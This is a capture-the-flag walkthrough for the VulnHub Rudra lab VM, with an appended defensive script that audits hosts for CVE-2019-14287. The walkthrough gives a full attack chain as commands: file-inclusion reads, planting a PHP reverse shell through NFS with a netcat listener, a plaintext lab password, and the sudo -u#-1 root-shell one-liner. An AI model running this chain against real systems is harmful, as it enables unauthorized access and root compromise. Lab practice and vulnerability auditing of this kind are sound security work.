Environment
Virtual machine platform: VMware Workstation Pro
Attacker machine: Kali (IP: 192.168.253.136)
Target machine: Rudra (IP: 192.168.253.149)
Download: https://www.vulnhub.com/entry/ha-rudra,386/
Let’s go
nmap -A 192.168.253.149
The web page gives no hints, so enumerate the directories
dirb http://192.168.253.149
Testing shows that nandi.php has a file inclusion vulnerability
curl 'http://192.168.253.149/nandi.php?file=/etc/passwd'
We can upload a reverse shell through NFS
showmount -e 192.168.253.149
mkdir nfs
mount -t nfs 192.168.253.149:/home/shivay /root/nfs
cp ../Assorted/php-reverse-shell.php shell.php
curl 'http://192.168.253.149/nandi.php?file=/home/shivay/shell.php'
nc -lp 4444
netstat -pantu
python3 -c 'import pty; pty.spawn("/bin/bash")'
mysql -u root
show databases;
use mahadev;
show tables;
select * from hint;
cd media
cat creds
Download the file to the local machine, then decode it with the tool here: https://github.com/TryCatchHCF/Cloakify
ssh mahakaal@192.168.253.149
password:kalbhairav
sudo -l
password:kalbhairav
This step relies on CVE-2019-14287; for reference see https://paper.seebug.org/1057/
sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0'
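A defender-side check for the sudo issue used in the last step, as an added example that is not part of the original write-up: it reports whether a sudo version predates 1.8.28 (the release that fixed CVE-2019-14287) and whether a sudoers file contains a Runas list such as (ALL, !root). The function names, the users alice and bob, and the sample sudoers fragment are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a host for exposure to CVE-2019-14287.

# Return 0 if the sudo version is older than 1.8.28 (the release with the fix),
# 1 if it is 1.8.28 or newer, 2 if the string cannot be parsed.
sudo_version_vulnerable() {
    v=${1%%[!0-9.]*}                       # "1.8.21p2" -> "1.8.21"
    case $v in [0-9]*.[0-9]*) ;; *) return 2 ;; esac
    major=${v%%.*}; rest=${v#*.}
    minor=${rest%%.*}; patch=0
    case $rest in *.*) patch=${rest#*.}; patch=${patch%%.*} ;; esac
    [ $((major * 1000000 + minor * 1000 + ${patch:-0})) -lt 1008028 ]
}

# Print sudoers rules whose Runas list allows ALL users but excludes root,
# e.g. "(ALL, !root)": the configuration in which the bug bypasses the exclusion.
# Comment lines are skipped, but "#<digits>" at line start is a user ID, not a comment.
exposed_runas_rules() {
    grep -vE '^[[:space:]]*#([^0-9]|$)' "$1" |
        grep -E '\([^)]*ALL[^)]*![[:space:]]*(root|#0)[[:space:]]*[,:)]'
}

# Return 0 (affected) only when the version is vulnerable and such a rule exists.
host_affected() {
    sudo_version_vulnerable "$1" && [ -n "$(exposed_runas_rules "$2")" ]
}

# Constructed sample input (hypothetical users alice and bob), so the demo runs offline.
# On a real host: host_affected "$(sudo -V | awk 'NR==1 {print $3}')" /etc/sudoers
sample=$(mktemp)
cat >"$sample" <<'EOF'
# constructed sudoers fragment
alice ALL=(ALL, !root) /usr/bin/watch
bob   ALL=(ALL) /usr/bin/systemctl
EOF

if host_affected "1.8.27" "$sample"; then
    echo "affected: upgrade sudo to 1.8.28 or later and review these rules:"
    exposed_runas_rules "$sample"
fi
```

The rule scan reads one file at a time, so run it against /etc/sudoers and each file under /etc/sudoers.d.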